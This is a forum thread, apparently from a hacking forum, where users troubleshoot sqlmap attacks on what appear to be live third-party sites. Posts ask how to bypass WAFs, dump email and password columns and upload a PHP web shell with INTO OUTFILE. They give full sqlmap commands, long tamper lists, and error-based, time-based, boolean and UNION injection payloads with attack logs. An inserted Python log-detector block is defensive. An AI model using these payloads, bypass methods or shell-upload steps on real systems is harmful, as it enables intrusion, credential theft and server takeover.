Questions about SQLMap

Discussion in 'Vulnerabilities' started by randman, 1 Oct 2015.

  1. dddg33

    dddg33 New Member

    Joined:
    28 Mar 2021
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    After
    Code:
    --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
    it returned

    Code:
    [01:16:41] [CRITICAL] unable to retrieve the tables for any database
    [01:16:41] [WARNING] HTTP error codes detected during run:
    414 (Request-URI Too Long) - 4 times, 500 (Internal Server Error) - 1 times, 400 (Bad Request) - 1 times, 404 (Not Found) - 8 times
    [01:16:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
    How can the WAF be bypassed?
    Thanks in advance!
     
  2. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    64
    Likes Received:
    5
    Reputations:
    0
    I can't dump table_names no matter what; I tried --hex, --no-cast, tamper scripts

    Code:
    
    [05:46:09] [INFO] fetching tables for database: 'ar_new'
    [05:46:09] [INFO] fetching number of tables for database 'ar_new'
    you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
    [05:46:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [05:46:10] [INFO] retrieved:
    [05:46:11] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [05:46:11] [WARNING] unable to retrieve the number of tables for database 'ar_new'
    [05:46:11] [ERROR] unable to retrieve the table names for any database
    do you want to use common table existence check? [y/N/q] N
    No tables found
    [05:46:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/sayt.com'
    
    
     
  3. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    55
    Likes Received:
    5
    Reputations:
    0

    Is there a full manual from you somewhere?
     
  4. Juiseppe

    Juiseppe New Member

    Joined:
    16 Feb 2020
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Has anyone bypassed the Imunify360 (CloudLinux) WAF with sqlmap?
     
  5. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    233
    Likes Received:
    778
    Reputations:
    208
    An error on a negative limit
     
    #1125 Baskin-Robbins, 8 May 2021
    Last edited: 9 May 2021
    seostock likes this.
  6. matthhy

    matthhy New Member

    Joined:
    16 Feb 2017
    Messages:
    57
    Likes Received:
    0
    Reputations:
    0
    Could you please advise: I scanned a site with Acunetix and it found an SQL vulnerability, but sqlmap can't get through it, I think because of a WAF. How do I figure out which tamper to use, or how do I pull the information sqlmap needs out of Acunetix?
     
  7. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    239
    Likes Received:
    440
    Reputations:
    142
    That's not quite how it works. First you need to work the vulnerability out yourself, and then automate the process with sqlmap. So, to understand which tamper to use, work it out by hand first.
     
    K800 and Svan like this.
  8. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    I'm trying to dump data and for almost an hour now I've had this:
    [INFO] fetching entries of column(s) 'email,passwort' for table....
    With no movement at all. Could it be that sqlmap takes a long time counting the number of rows if the database is large?
     
  9. brown

    brown New Member

    Joined:
    16 Oct 2016
    Messages:
    190
    Likes Received:
    4
    Reputations:
    0
    SQL injection on Magento
    /result/?q=1'
    Acunetix found the SQL injection and even pulled out the DB name

    Code:
    Proof of Exploit
    SQL query - SELECT database()
    
    admin8sasdasd
    When sent through Burp
    site/result/?q=1'
    Response:

    Code:
    HTTP/1.1 503 Service Unavailable
    <pre>SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''/result/''q=1'')' at line 1<br />
    <strong>Trace:</strong>
    <p>Error log record number:
    <address class="copyright">Magento is a trademark of Magento Inc. Copyright &copy; 2010 Magento Inc.</address>
    But when I try to run it with sqlmap, it doesn't see the SQL injection(
    I tried --text-only

    Maybe there's some tamper for Magento?
     
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    879
    Reputations:
    859
    Here you need to look by hand at what triggers the error, and then fit a tamper to it by hand.
     
    _________________________
    joelblack likes this.
  11. Рамос

    Рамос Member

    Joined:
    30 Oct 2009
    Messages:
    123
    Likes Received:
    7
    Reputations:
    1
    sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --current-user
    Code:
    [INFO] retrieved: 'root@localhost'
    sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --file-write=C:/shell/shell.txt --file-dest=/var/www/shell.php

    >>It doesn't upload, although the privileges are there

    sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --sql-shell

    select user()
    Code:
    [INFO] retrieved: 'root@localhost'
    select 'test' into outfile '/var/www/test.txt'
    Code:
    [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
    
    What can I try? Or does into outfile not execute in an error-based injection? load_file works
     
    #1131 Рамос, 11 Jul 2021
    Last edited: 11 Jul 2021
  12. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    233
    Likes Received:
    778
    Reputations:
    208
    Privileges like FILE != write permissions on the directory
    +
    you haven't shown the user's privileges; root@localhost is not necessarily the root user of MySQL,
    but I think you know that.

    In theory it should, since union, error, etc. differ in the way the information is obtained, i.e. one and the same query
    can be union, error, time-based, blind and stacked queries, though this doesn't apply to all queries and DBMSs.

    Though it's not entirely clear to me why the first query worked but the second gives an error, but oh well.
    +

    In your case you can try uploading the file to other directories, or look for another vector.
     
    #1132 Baskin-Robbins, 12 Jul 2021
    Last edited: 12 Jul 2021
    Рамос and seostock like this.
  13. Рамос

    Рамос Member

    Joined:
    30 Oct 2009
    Messages:
    123
    Likes Received:
    7
    Reputations:
    1
    sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --privileges -U CU
    Code:
    [23:12:06] [INFO] fetching current user
    [23:12:07] [INFO] retrieved: 'root@localhost'
    
    [*] 'root'@'localhost' (administrator) [28]:
        privilege: ALTER
        privilege: ALTER ROUTINE
        privilege: CREATE
        privilege: CREATE ROUTINE
        privilege: CREATE TABLESPACE
        privilege: CREATE TEMPORARY TABLES
        privilege: CREATE USER
        privilege: CREATE VIEW
        privilege: DELETE
        privilege: DROP
        privilege: EVENT
        privilege: EXECUTE
        privilege: FILE
        privilege: INDEX
        privilege: INSERT
        privilege: LOCK TABLES
        privilege: PROCESS
        privilege: REFERENCES
        privilege: RELOAD
        privilege: REPLICATION CLIENT
        privilege: REPLICATION SLAVE
        privilege: SELECT
        privilege: SHOW DATABASES
        privilege: SHOW VIEW
        privilege: SHUTDOWN
        privilege: SUPER
        privilege: TRIGGER
        privilege: UPDATE
    @@secure_file_priv
    Code:
    sqlmap.py -r test.txt  --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select @@secure_file_priv;"
    [23:18:45] [INFO] fetching SQL SELECT statement query output: 'select @@secure_file_priv'
    [23:18:45] [INFO] resumed: ' '
    select @@secure_file_priv: ' '
    --technique=E
    Code:
    sqlmap.py -r test.txt  --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=E
    
    [23:21:25] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
    --technique=B
    Code:
    sqlmap.py -r test.txt  --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=B
    
    [23:22:31] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
    The privileges are all fine; I just can't understand why into outfile doesn't execute
     
    #1133 Рамос, 12 Jul 2021
    Last edited: 12 Jul 2021
  14. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    233
    Likes Received:
    778
    Reputations:
    208
    well, for a start it's worth putting a semicolon in the last queries)) although maybe sqlmap doesn't need that,
    I haven't used it in a long time.
    +
    https://github.com/sqlmapproject/sqlmap/issues/619
    In general the error is about stacked queries, and MySQL has no such injections,
    I don't know; I would turn verbose up to the maximum and try by hand.
    I probably can't help with anything more.
     
    #1134 Baskin-Robbins, 13 Jul 2021
    Last edited: 13 Jul 2021
    Рамос and seostock like this.
  15. Рамос

    Рамос Member

    Joined:
    30 Oct 2009
    Messages:
    123
    Likes Received:
    7
    Reputations:
    1
    Then I'm powerless here. Either I need to go to another thread or give up)

    SELECT user();
    qwe' AND EXTRACTVALUE(2410,CONCAT(0x5c,0x716a706a71,(SELECT MID((IFNULL(CAST(user() AS NCHAR),0x20)),1,21)),0x7176627a71)) AND 'Elwc'='Elwc
    Code:
    General error: 1105 XPATH syntax error: '\qjpjqroot@localhostqvbzq'

    SELECT 123 INTO OUTFILE '/tmp/test.txt';

    qwe' AND EXTRACTVALUE(4149,CONCAT(0x5c,0x716a706a71,(SELECT MID((IFNULL(CAST(123 INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,21)),0x7176627a71)) AND 'DLgP'='DLgP

    Code:
    SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,21)),0x7176627a71))' at line 1
    qwe' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(123 INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,1))>1) THEN 0x617364 ELSE 0x28 END)) AND 'yCEr'='yCEr

    Code:
    SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,1))>1) THEN 0x61736' at line 1
    qwe' LIMIT 0,1 INTO OUTFILE '/tmp/test.txt' LINES TERMINATED BY 0x313233-- -
    Code:
    SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'LIMIT 0,1 INTO OUTFILE '/tmp/test.txt' LINES TERMINATED BY 0x313233-- -')' at line 1
     
    #1135 Рамос, 13 Jul 2021
    Last edited: 14 Jul 2021
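
Added example, not part of any post in this thread and not sqlmap project code: a log-side detector for the request shapes quoted in the posts above (XPath error-based, SLEEP-based, ORD/MID inference, UNION NULL probes, schema enumeration, INTO OUTFILE), normalizing the encodings named in the first post's tamper list before matching. Rule names, log lines, paths and IP addresses are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Rule names are this example's own; patterns follow payload shapes quoted in the thread.
RULES = {
    "error_based_xpath": re.compile(r"\b(?:extractvalue|updatexml)\s*\(\s*\d+\s*,\s*concat\s*\(", re.I),
    "time_based_sleep": re.compile(r"\bselect\s*\(\s*sleep\s*\(", re.I),
    "boolean_ord_mid": re.compile(r"\bord\s*\(\s*mid\s*\(\s*\(\s*select\b", re.I),
    "union_null_probe": re.compile(r"\bunion\s+all\s+select\s+null(?:\s*,\s*null)*", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.tables\b|\bmysql\.innodb_table_stats\b", re.I),
    "file_write": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
}
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def normalize(value, max_rounds=3):
    """Undo nested URL-encoding, inline SQL comments and whitespace padding."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    # MySQL executes the body of /*!NNNNN ... */, so keep the body and drop the wrapper.
    value = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", value, flags=re.S)
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)  # /**/ standing in for a space
    return re.sub(r"\s+", " ", value)


def classify(uri):
    """Return the sorted names of every rule the normalized URI matches."""
    text = normalize(uri)
    return sorted(name for name, rx in RULES.items() if rx.search(text))


def scan(lines):
    """Group rule hits and 4xx/5xx counts per client; any file write is critical."""
    hits, errors = defaultdict(set), defaultdict(int)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits[m["ip"]].update(classify(m["uri"]))
        errors[m["ip"]] += m["status"][0] in "45"
    return {
        ip: {"rules": sorted(r), "http_errors": errors[ip], "critical": "file_write" in r}
        for ip, r in hits.items() if r
    }


# Constructed access-log lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Jul/2021:23:21:25 +0000] "GET /login?password=qwe%27%20AND%20'
    'EXTRACTVALUE(2410,CONCAT(0x5c,(SELECT%20user())))%20AND%20%27a%27=%27a HTTP/1.1" 500 512',
    '203.0.113.7 - - [13/Jul/2021:23:22:31 +0000] "GET /login?password=qwe%2527/**/LIMIT/**/0,1'
    '/**/INTO/**/OUTFILE/**/%2527/tmp/test.txt%2527 HTTP/1.1" 500 498',
    '203.0.113.7 - - [13/Jul/2021:23:23:02 +0000] "GET /blog/category/beauty%27%20AND%20'
    '(SELECT%203461%20FROM%20(SELECT(SLEEP(5)))x)--%20y HTTP/1.1" 200 1033',
    '198.51.100.20 - - [13/Jul/2021:23:23:10 +0000] "GET /blog/category/beauty?page=2 HTTP/1.1" 200 8120',
    '198.51.100.20 - - [13/Jul/2021:23:23:15 +0000] "GET /search?q=credit+union+select+committee HTTP/1.1" 200 4410',
]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG).items():
        print(ip, finding)
```

Several distinct rule families from one client, together with a burst of 4xx/5xx responses like the one sqlmap itself reports in the first post, is a stronger signal than any single match.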
  16. birdborn

    birdborn New Member

    Joined:
    15 Jul 2021
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    IIS/dbms:mssql
    boolean-based blind/error-based
    1. With technique=B --is-dba=true, with technique=E --is-dba=false. Why?
    2. When listing tables (technique=E): [WARNING] the SQL query provided does not return any output (listing the databases works fine). common-tables helps, but since the site is custom-written it finds only 5 tables.
    How do I make sqlmap list the tables? :rolleyes:

    Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)
    Payload: cat=-5625) OR 3972=CONCAT(CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (3972=3972) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(113)) AND (8607=8607
    Vector: OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')
    ---
    [INFO] fetching tables for database: db1
    [PAYLOAD] -1789
    [PAYLOAD] -6678) OR 4206=CONCAT(CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118)+CHAR(113),(SELECT COUNT(db1..sysusers.name+CHAR(46)+db1..sysobjects.name AS table_name) FROM db1..sysobjects INNER JOIN db1..sysusers ON db1..sysobjects.uid=db1..sysusers.uid WHERE db1..sysobjects.xtype IN (CHAR(117),CHAR(118))),CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(113)) AND (2349=2349
    [WARNING] the SQL query provided does not return any output
     
  17. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    427
    Likes Received:
    307
    Reputations:
    5
    It's tough with Cloud; there are no publicly available tampers for it. As an option, look for the real IP, which doesn't always work out
     
  18. brown

    brown New Member

    Joined:
    16 Oct 2016
    Messages:
    190
    Likes Received:
    4
    Reputations:
    0
    Code:
    Parameter: #1* (URI)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: http://' AND 7389=7389-- qoxM
    
        Vector: AND [INFERENCE]
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: http://' AND (SELECT 9965 FRO
    M (SELECT(SLEEP(5)))umCy)-- CigK
        Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE]
    ,0,[SLEEPTIME])))))[RANDSTR])
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 5 columns
        Payload: http://:80/blog/category/-2990' UNION ALL SELECT NULL
    ,NULL,NULL,NULL,CONCAT(0x716a707171,0x565a7070474f77495945716a52566b686252457372
    674b776e694f6f6877554c4b564f4b6a4c464a,0x716a7a7071)-- -
        Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY]-- -
    ---
    [06:15:30] [INFO] testing MySQL
    [06:15:30] [DEBUG] performed 0 queries in 0.02 seconds
    [06:15:30] [INFO] confirming MySQL
    [06:15:30] [DEBUG] performed 0 queries in 0.00 seconds
    [06:15:30] [PAYLOAD] -8917' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
    7171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a707
    1)-- -
    [06:15:32] [DEBUG] turning off NATIONAL CHARACTER casting
    [06:15:32] [PAYLOAD] -8379' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
    7171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a707
    1)-- -
    [06:15:34] [DEBUG] performed 2 queries in 4.32 seconds
    [06:15:34] [DEBUG] performed 0 queries in 0.01 seconds
    [06:15:34] [INFO] the back-end DBMS is MySQL
    web application technology: Nginx
    back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
    [06:15:34] [INFO] fetching tables for database: 'DB'
    [06:15:34] [PAYLOAD] -9852' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
    7171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_name)),0x716a7a7071) FROM INFO
    RMATION_SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- -
    [06:15:37] [PAYLOAD] -6604' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
    7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM INFORMATION
    _SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- -
    [06:15:40] [WARNING] the SQL query provided does not return any output
    [06:15:40] [WARNING] in case of continuous data retrieval problems you are advis
    ed to try a switch '--no-cast' or switch '--hex'
    [06:15:40] [PAYLOAD] -6180' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
    7171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_name)),0x716a7a7071) FROM mysq
    l.innodb_table_stats WHERE database_name IN (0x70617266756d)-- -
    [06:15:43] [PAYLOAD] -8023' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
    7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM mysql.innod
    b_table_stats WHERE database_name IN (0x70617266756d)-- -
    [06:15:45] [WARNING] the SQL query provided does not return any output
    [06:15:45] [INFO] fetching number of tables for database 'DB'
    [06:15:45] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
    S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
    1,1))>51-- ZVRv
    [06:15:48] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
    S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
    1,1))>48-- ZVRv
    [06:15:51] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
    S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
    1,1))>9-- ZVRv
    [06:15:52] [INFO] retrieved:
    [06:15:52] [DEBUG] performed 3 queries in 6.77 seconds
    multi-threading is considered unsafe in time-based data retrieval. Are you sure
    of your choice (breaking warranty) [y/N] N
    [06:15:52] [DEBUG] used the default behavior, running in batch mode
    [06:15:52] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
    SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
    ES WHERE table_schema=0x70617266756d),1,1))>51,0,5)))))HoOT)-- oDuA
    [06:15:52] [WARNING] time-based comparison requires larger statistical model, pl
    ease wait..................... (done)
    [06:16:00] [CRITICAL] considerable lagging has been detected in connection respo
    nse(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or
     more)
    [06:16:01] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
    SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
    ES WHERE table_schema=0x70617266756d),1,1))>48,0,5)))))HoOT)-- oDuA
    [06:16:01] [WARNING] it is very important to not stress the network connection d
    uring usage of time-based payloads to prevent potential disruptions
    [06:16:02] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
    SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
    ES WHERE table_schema=0x70617266756d),1,1))>9,0,5)))))HoOT)-- oDuA
    [06:16:03] [INFO] retrieved:
    [06:16:03] [DEBUG] performed 3 queries in 11.19 seconds
    [06:16:03] [WARNING] unable to retrieve the number of tables for database 'parfu
    m'
    [06:16:03] [INFO] fetching number of tables for database 'DB'
    [06:16:03] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
    S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
    1,1))>51-- LERK
    [06:16:05] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
    S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
    1,1))>48-- LERK
    [06:16:06] [DEBUG] turning off reflection removal mechanism (for optimization pu
    rposes)
    [06:16:06] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
    S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
    1,1))>9-- LERK
    [06:16:07] [INFO] retrieved:
    [06:16:07] [DEBUG] performed 3 queries in 3.66 seconds
    [06:16:07] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
    SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
    s WHERE database_name=0x70617266756d),1,1))>51,0,5)))))FEKR)-- xICj
    [06:16:08] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
    SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
    s WHERE database_name=0x70617266756d),1,1))>48,0,5)))))FEKR)-- xICj
    [06:16:09] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
    SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
    s WHERE database_name=0x70617266756d),1,1))>9,0,5)))))FEKR)-- xICj
    [06:16:10] [INFO] retrieved:
    [06:16:10] [DEBUG] performed 3 queries in 3.23 seconds
    [06:16:10] [ERROR] unable to retrieve the table names for any database
    do you want to use common table existence check? [y/N/q] N
    [06:16:10] [DEBUG] used the default behavior, running in batch mode
    No tables found
     
  19. msk_smail

    msk_smail New Member

    Joined:
    9 Mar 2016
    Messages:
    48
    Likes Received:
    4
    Reputations:
    0
    Code:
    [06:15:40] [WARNING] in case of continuous data retrieval problems you are advis
    ed to try a switch '--no-cast' or switch '--hex'
    try starting with this first + the tampers you already have, including ones for select. Set verbose 3 and watch
     
  20. brown

    brown New Member

    Joined:
    16 Oct 2016
    Messages:
    190
    Likes Received:
    4
    Reputations:
    0
    didn't help(
     